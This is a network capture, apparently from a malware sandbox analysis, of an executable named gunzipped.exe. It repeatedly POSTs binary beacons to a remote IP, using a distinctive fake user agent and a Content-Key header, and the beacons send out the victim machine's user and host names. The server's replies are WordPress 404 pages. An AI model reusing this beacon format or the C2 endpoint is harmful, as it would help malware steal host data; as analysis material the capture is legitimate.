Apr 17, 2024 03:18:38.553911924 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	49784	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:38.899573088 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:39.102776051 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:40.071350098 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:38 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:40.071413040 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:40.071449995 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:40.071485043 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:40.071527004 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:40.071567059 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:40.071607113 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:40.071649075 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:40.071686029 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:40.071727991 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	49785	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:40.424546003 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:40.628382921 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:41.577303886 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:40 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:41.577363968 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:41.577400923 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:41.577439070 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:41.577482939 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:41.577528000 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:41.577570915 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:41.577615023 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:41.577653885 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:41.577692032 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	49786	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:41.923839092 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:42.127413034 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:43.027508974 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:42 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 